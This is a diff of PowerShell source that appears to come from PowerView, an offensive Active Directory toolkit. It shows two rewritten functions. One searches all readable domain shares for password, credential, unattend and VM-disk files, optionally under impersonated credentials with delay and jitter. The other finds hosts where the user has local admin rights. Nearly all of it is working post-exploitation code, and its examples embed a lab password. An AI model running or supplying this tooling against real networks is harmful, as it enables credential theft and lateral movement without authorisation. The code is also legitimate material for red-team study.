+Only return files with a LastWriteTime greater than this date value.
 
-        Output results to a specified csv output file.
+.PARAMETER CreationTime
 
-    .PARAMETER NoClobber
+Only return files with a CreationTime greater than this date value.
 
-        Switch. Don't overwrite any existing output file.
+.PARAMETER OfficeDocs
 
-    .PARAMETER NoPing
+Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
 
-        Switch. Don't ping each host to ensure it's up before enumerating.
+.PARAMETER FreshEXEs
 
-    .PARAMETER Delay
+Switch. Find .EXEs accessed within the last 7 days.
 
-        Delay between enumerating hosts, defaults to 0
+.PARAMETER Server
 
-    .PARAMETER Jitter
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER SearchScope
 
-    .PARAMETER Domain
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-        Domain to query for machines, defaults to the current domain.
+.PARAMETER ResultPageSize
 
-    .PARAMETER DomainController
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER SearchForest
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Search all domains in the forest for target users instead of just
-        a single domain.
+.PARAMETER Tombstone
 
-    .PARAMETER SearchSYSVOL
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Switch. Search for login scripts on the SYSVOL of the primary DCs for each specified domain.
+.PARAMETER Credential
 
-    .PARAMETER Threads
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-        The maximum concurrent threads to execute.
+.PARAMETER Delay
 
-    .PARAMETER UsePSDrive
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-        Switch. Mount target remote path with temporary PSDrives.
+.PARAMETER Jitter
 
-    .EXAMPLE
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-        PS C:\> Invoke-FileFinder
+.PARAMETER Threads
 
-        Find readable files on the domain with 'pass', 'sensitive',
-        'secret', 'admin', 'login', or 'unattend*.xml' in the name,
+The number of threads to use for user searching, defaults to 20.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-FileFinder -Domain testing
+Find-InterestingDomainShareFile
 
-        Find readable files on the 'testing' domain with 'pass', 'sensitive',
-        'secret', 'admin', 'login', or 'unattend*.xml' in the name,
+Finds 'interesting' files on the current domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-FileFinder -IncludeC
+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
 
-        Find readable files on the domain with 'pass', 'sensitive',
-        'secret', 'admin', 'login' or 'unattend*.xml' in the name,
-        including C$ shares.
+Finds 'interesting' files on readable shares on the specified systems.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-FileFinder -ShareList shares.txt -Terms accounts,ssn -OutFile out.csv
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
 
-        Enumerate a specified share list for files with 'accounts' or
-        'ssn' in the name, and write everything to "out.csv"
+Searches interesting files in the testlab.local domain using the specified alternate credentials.
 
-    .LINK
-        http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/
+.OUTPUTS
 
+PowerView.FoundFile
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.FoundFile')]
+    [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
+        $ComputerSearchBase,
 
-        [ValidateScript({Test-Path -Path $_ })]
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
         [String]
-        $ShareList,
+        $ComputerOperatingSystem,
 
-        [Switch]
-        $OfficeDocs,
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
+        [String]
+        $ComputerServicePack,
 
-        [Switch]
-        $FreshEXEs,
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
+        [String]
+        $ComputerSiteName,
 
-        [Alias('Terms')]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('SearchTerms', 'Terms')]
         [String[]]
-        $SearchTerms, 
+        $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [String]
-        $TermList,
+        [ValidateNotNullOrEmpty()]
+        [ValidatePattern('\\\\')]
+        [Alias('Share')]
+        [String[]]
+        $SharePath,
 
-        [String]
+        [String[]]
+        $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'),
+
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $LastAccessTime,
 
-        [String]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $LastWriteTime,
 
-        [String]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $CreationTime,
 
+        [Parameter(ParameterSetName = 'OfficeDocs')]
         [Switch]
-        $IncludeC,
+        $OfficeDocs,
 
+        [Parameter(ParameterSetName = 'FreshEXEs')]
         [Switch]
-        $IncludeAdmin,
+        $FreshEXEs,
 
-        [Switch]
-        $ExcludeFolders,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        [Switch]
-        $ExcludeHidden,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $CheckWriteAccess,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [String]
-        $OutFile,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
         [Switch]
-        $NoClobber,
+        $Tombstone,
 
-        [Switch]
-        $NoPing,
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-        [UInt32]
+        [ValidateRange(1, 10000)]
+        [Int]
         $Delay = 0,
 
+        [ValidateRange(0.0, 1.0)]
         [Double]
         $Jitter = .3,
 
-        [String]
-        $Domain,
-
-        [String]
-        $DomainController,
-        
-        [Switch]
-        $SearchForest,
-
-        [Switch]
-        $SearchSYSVOL,
-
-        [ValidateRange(1,100)] 
         [Int]
-        $Threads,
-
-        [Switch]
-        $UsePSDrive
+        [ValidateRange(1, 100)]
+        $Threads = 20
     )
 
-    begin {
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
+    BEGIN {
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
+        }
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
         }
-
-        # random object for delay
-        $RandNo = New-Object System.Random
-
-        Write-Verbose "[*] Running Invoke-FileFinder with delay of $Delay"
-
-        $Shares = @()
-
-        # figure out the shares we want to ignore
-        [String[]] $ExcludedShares = @("C$", "ADMIN$")
-
-        # see if we're specifically including any of the normally excluded sets
-        if ($IncludeC) {
-            if ($IncludeAdmin) {
-                $ExcludedShares = @()
-            }
-            else {
-                $ExcludedShares = @("ADMIN$")
-            }
-        }
-
-        if ($IncludeAdmin) {
-            if ($IncludeC) {
-                $ExcludedShares = @()
-            }
-            else {
-                $ExcludedShares = @("C$")
-            }
+        else {
+            Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain'
+            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
         }
-
-        # delete any existing output file if it already exists
-        if(!$NoClobber) {
-            if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }
+        Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-InterestingDomainShareFile] No hosts found to enumerate'
         }
 
-        # if there's a set of terms specified to search for
-        if ($TermList) {
-            ForEach ($Term in Get-Content -Path $TermList) {
-                if (($Term -ne $Null) -and ($Term.trim() -ne '')) {
-                    $SearchTerms += $Term
-                }
-            }
-        }
+        # the host enumeration block we're using to enumerate all servers
+        $HostEnumBlock = {
+            Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle)
 
-        # if we're hard-passed a set of shares
-        if($ShareList) {
-            ForEach ($Item in Get-Content -Path $ShareList) {
-                if (($Item -ne $Null) -and ($Item.trim() -ne '')) {
-                    # exclude any "[tab]- commants", i.e. the output from Invoke-ShareFinder
-                    $Share = $Item.Split("`t")[0]
-                    $Shares += $Share
-                }
-            }
-        }
-        else {
-            # if we're using a host file list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
+            if ($TokenHandle) {
+                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
             }
 
-            if(!$ComputerName) {
+            ForEach ($TargetComputer in $ComputerName) {
 
-                if($Domain) {
-                    $TargetDomains = @($Domain)
-                }
-                elseif($SearchForest) {
-                    # get ALL the domains in the forest to search
-                    $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
+                $SearchShares = @()
+                if ($TargetComputer.StartsWith('\\')) {
+                    # if a share is passed as the server
+                    $SearchShares += $TargetComputer
                 }
                 else {
-                    # use the local domain
-                    $TargetDomains = @( (Get-NetDomain).name )
+                    $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                    if ($Up) {
+                        # get the shares for this host and display what we find
+                        $Shares = Get-NetShare -ComputerName $TargetComputer
+                        ForEach ($Share in $Shares) {
+                            $ShareName = $Share.Name
+                            $Path = '\\'+$TargetComputer+'\'+$ShareName
+                            # make sure we get a real share name back
+                            if (($ShareName) -and ($ShareName.Trim() -ne '')) {
+                                # skip this share if it's in the exclude list
+                                if ($ExcludedShares -NotContains $ShareName) {
+                                    # check if the user has access to this path
+                                    try {
+                                        $Null = [IO.Directory]::GetFiles($Path)
+                                        $SearchShares += $Path
+                                    }
+                                    catch {
+                                        Write-Verbose "[!] No access to $Path"
+                                    }
+                                }
+                            }
+                        }
+                    }
                 }
 
-                if($SearchSYSVOL) {
-                    ForEach ($Domain in $TargetDomains) {
-                        $DCSearchPath = "\\$Domain\SYSVOL\"
-                        Write-Verbose "[*] Adding share search path $DCSearchPath"
-                        $Shares += $DCSearchPath
+                ForEach ($Share in $SearchShares) {
+                    Write-Verbose "Searching share: $Share"
+                    $SearchArgs = @{
+                        'Path' = $Share
+                        'Include' = $Include
                     }
-                    if(!$SearchTerms) {
-                        # search for interesting scripts on SYSVOL
-                        $SearchTerms = @('.vbs', '.bat', '.ps1')
+                    if ($OfficeDocs) {
+                        $SearchArgs['OfficeDocs'] = $OfficeDocs
                     }
-                }
-                else {
-                    [array]$ComputerName = @()
-
-                    ForEach ($Domain in $TargetDomains) {
-                        Write-Verbose "[*] Querying domain $Domain for hosts"
-                        $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
+                    if ($FreshEXEs) {
+                        $SearchArgs['FreshEXEs'] = $FreshEXEs
                     }
-
-                    # remove any null target hosts, uniquify the list and shuffle it
-                    $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-                    if($($ComputerName.Count) -eq 0) {
-                        throw "No hosts found!"
+                    if ($LastAccessTime) {
+                        $SearchArgs['LastAccessTime'] = $LastAccessTime
+                    }
+                    if ($LastWriteTime) {
+                        $SearchArgs['LastWriteTime'] = $LastWriteTime
                     }
+                    if ($CreationTime) {
+                        $SearchArgs['CreationTime'] = $CreationTime
+                    }
+                    if ($CheckWriteAccess) {
+                        $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess
+                    }
+                    Find-InterestingFile @SearchArgs
                 }
             }
-        }
 
-        # script block that enumerates shares and files on a server
-        $HostEnumBlock = {
-            param($ComputerName, $Ping, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive)
-
-            Write-Verbose "ComputerName: $ComputerName"
-            Write-Verbose "ExcludedShares: $ExcludedShares"
-            $SearchShares = @()
+            if ($TokenHandle) {
+                Invoke-RevertToSelf
+            }
+        }
 
-            if($ComputerName.StartsWith("\\")) {
-                # if a share is passed as the server
-                $SearchShares += $ComputerName
+        $LogonToken = $Null
+        if ($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential
             }
             else {
-                # if we're enumerating the shares on the target server first
-                $Up = $True
-                if($Ping) {
-                    $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
-                }
-                if($Up) {
-                    # get the shares for this host and display what we find
-                    $Shares = Get-NetShare -ComputerName $ComputerName
-                    ForEach ($Share in $Shares) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
+            }
+        }
+    }
 
-                        $NetName = $Share.shi1_netname
-                        $Path = '\\'+$ComputerName+'\'+$NetName
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-                        # make sure we get a real share name back
-                        if (($NetName) -and ($NetName.trim() -ne '')) {
+            Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter"
+            $Counter = 0
+            $RandNo = New-Object System.Random
 
-                            # skip this share if it's in the exclude list
-                            if ($ExcludedShares -NotContains $NetName.ToUpper()) {
-                                # check if the user has access to this path
-                                try {
-                                    $Null = [IO.Directory]::GetFiles($Path)
-                                    $SearchShares += $Path
-                                }
-                                catch {
-                                    Write-Verbose "[!] No access to $Path"
-                                }
-                            }
-                        }
-                    }
-                }
-            }
+            ForEach ($TargetComputer in $TargetComputers) {
+                $Counter = $Counter + 1
 
-            ForEach($Share in $SearchShares) {
-                $SearchArgs =  @{
-                    'Path' = $Share
-                    'SearchTerms' = $SearchTerms
-                    'OfficeDocs' = $OfficeDocs
-                    'FreshEXEs' = $FreshEXEs
-                    'LastAccessTime' = $LastAccessTime
-                    'LastWriteTime' = $LastWriteTime
-                    'CreationTime' = $CreationTime
-                    'ExcludeFolders' = $ExcludeFolders
-                    'ExcludeHidden' = $ExcludeHidden
-                    'CheckWriteAccess' = $CheckWriteAccess
-                    'OutFile' = $OutFile
-                    'UsePSDrive' = $UsePSDrive
-                }
+                # sleep for our semi-randomized interval
+                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Find-InterestingFile @SearchArgs
+                Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken
             }
         }
-    }
-
-    process {
-
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
+        else {
+            Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads"
 
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
+            # if we're using threading, kick off the script block with New-ThreadedFunction
             $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
+                'Include' = $Include
                 'ExcludedShares' = $ExcludedShares
-                'SearchTerms' = $SearchTerms
-                'ExcludeFolders' = $ExcludeFolders
                 'OfficeDocs' = $OfficeDocs
                 'ExcludeHidden' = $ExcludeHidden
                 'FreshEXEs' = $FreshEXEs
                 'CheckWriteAccess' = $CheckWriteAccess
-                'OutFile' = $OutFile
-                'UsePSDrive' = $UsePSDrive
+                'TokenHandle' = $LogonToken
             }
 
-            # kick off the threaded script block + arguments 
-            if($Shares) {
-                # pass the shares as the hosts so the threaded function code doesn't have to be hacked up
-                Invoke-ThreadedFunction -ComputerName $Shares -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
-            }
-            else {
-                Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
-            }
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
+    }
 
-        else {
-            if($Shares){
-                $ComputerName = $Shares
-            }
-            elseif(-not $NoPing -and ($ComputerName.count -gt 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
-            }
-
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
-            $Counter = 0
-
-            $ComputerName | Where-Object {$_} | ForEach-Object {
-                Write-Verbose "Computer: $_"
-                $Counter = $Counter + 1
-
-                # sleep for our semi-randomized interval
-                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
-
-                Write-Verbose "[*] Enumerating server $_ ($Counter of $($ComputerName.count))"
-
-                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $_, $False, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive                
-            }
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
         }
     }
 }
@@ -11614,896 +16684,616 @@ function Invoke-FileFinder {
 
 function Find-LocalAdminAccess {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Finds machines on the local domain where the current user has local administrator access.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction  
 
-        Finds machines on the local domain where the current user has
-        local administrator access. Uses multithreading to
-        speed up enumeration.
+.DESCRIPTION
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and for each computer it checks if the current user
+has local administrator access using Test-AdminAccess. If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
 
-    .DESCRIPTION
+Idea adapted from the local_admin_search_enum post module in Metasploit written by:
+    'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+    'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
+    'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
 
-        This function finds the local domain name for a host using Get-NetDomain,
-        queries the domain for all active machines with Get-NetComputer, then for
-        each server it checks if the current user has local administrator
-        access using Invoke-CheckLocalAdminAccess.
+.PARAMETER ComputerName
 
-        Idea stolen from the local_admin_search_enum post module in
-        Metasploit written by:
-            'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
-            'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
-            'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-    .PARAMETER ComputerName
+.PARAMETER ComputerDomain
 
-        Host array to enumerate, passable on the pipeline.
+Specifies the domain to query for computers, defaults to the current domain.
 
-    .PARAMETER ComputerFile
+.PARAMETER ComputerLDAPFilter
 
-        File of hostnames/IPs to search.
+Specifies an LDAP query string that is used to search for computer objects.
 
-    .PARAMETER ComputerFilter
+.PARAMETER ComputerSearchBase
 
-        Host filter name to query AD for, wildcards accepted.
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-    .PARAMETER ComputerADSpath
+.PARAMETER ComputerOperatingSystem
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Search computers with a specific operating system, wildcards accepted.
 
-    .PARAMETER NoPing
+.PARAMETER ComputerServicePack
 
-        Switch. Don't ping each host to ensure it's up before enumerating.
+Search computers with a specific service pack, wildcards accepted.
 
-    .PARAMETER Delay
+.PARAMETER ComputerSiteName
 
-        Delay between enumerating hosts, defaults to 0
+Search computers in the specific AD Site name, wildcards accepted.
 
-    .PARAMETER Jitter
+.PARAMETER CheckShareAccess
 
-        Jitter for the host delay, defaults to +/- 0.3
+Switch. Only display found shares that the local user has access to.
 
-    .PARAMETER Domain
+.PARAMETER Server
 
-        Domain to query for machines, defaults to the current domain.
-    
-    .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
 
-    .PARAMETER SearchForest
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+.PARAMETER ResultPageSize
 
-    .PARAMETER Threads
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The maximum concurrent threads to execute.
+.PARAMETER ServerTimeLimit
 
-    .EXAMPLE
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        PS C:\> Find-LocalAdminAccess
+.PARAMETER Tombstone
 
-        Find machines on the local domain where the current user has local
-        administrator access.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Find-LocalAdminAccess -Threads 10
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-        Multi-threaded access hunting, replaces Find-LocalAdminAccessThreaded.
+.PARAMETER Delay
 
-    .EXAMPLE
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-        PS C:\> Find-LocalAdminAccess -Domain testing
+.PARAMETER Jitter
 
-        Find machines on the 'testing' domain where the current user has
-        local administrator access.
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-    .EXAMPLE
+.PARAMETER Threads
 
-        PS C:\> Find-LocalAdminAccess -ComputerFile hosts.txt
+The number of threads to use for user searching, defaults to 20.
 
-        Find which machines in the host list the current user has local
-        administrator access.
+.EXAMPLE
 
-    .LINK
+Find-LocalAdminAccess
 
-        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
-        http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/
+Finds machines in the current domain the current user has admin access to.
+
+.EXAMPLE
+
+Find-LocalAdminAccess -Domain dev.testlab.local
+
+Finds machines in the dev.testlab.local domain the current user has admin access to.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
+
+Finds machines in the testlab.local domain that the user with the specified -Credential
+has admin access to.
+
+.OUTPUTS
+
+String
+
+Computer dnshostnames the current user has administrative access to.
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([String])]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
-
-        [Switch]
-        $NoPing,
+        $ComputerSearchBase,
 
-        [UInt32]
-        $Delay = 0,
-
-        [Double]
-        $Jitter = .3,
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
+        [String]
+        $ComputerOperatingSystem,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
         [String]
-        $Domain,
+        $ComputerServicePack,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
         [String]
-        $DomainController,
+        $ComputerSiteName,
 
         [Switch]
-        $SearchForest,
+        $CheckShareAccess,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,100)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $Threads
-    )
+        $ResultPageSize = 200,
 
-    begin {
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-        # random object for delay
-        $RandNo = New-Object System.Random
+        [Switch]
+        $Tombstone,
 
-        Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay"
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-        # if we're using a host list, read the targets in and add them to the target list
-        if($ComputerFile) {
-            $ComputerName = Get-Content -Path $ComputerFile
-        }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $Delay = 0,
 
-        if(!$ComputerName) {
-            [array]$ComputerName = @()
+        [ValidateRange(0.0, 1.0)]
+        [Double]
+        $Jitter = .3,
 
-            if($Domain) {
-                $TargetDomains = @($Domain)
-            }
-            elseif($SearchForest) {
-                # get ALL the domains in the forest to search
-                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-            }
-            else {
-                # use the local domain
-                $TargetDomains = @( (Get-NetDomain).name )
-            }
+        [Int]
+        [ValidateRange(1, 100)]
+        $Threads = 20
+    )
 
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for hosts"
-                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
-            }
-        
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
-            }
+    BEGIN {
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
+        }
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
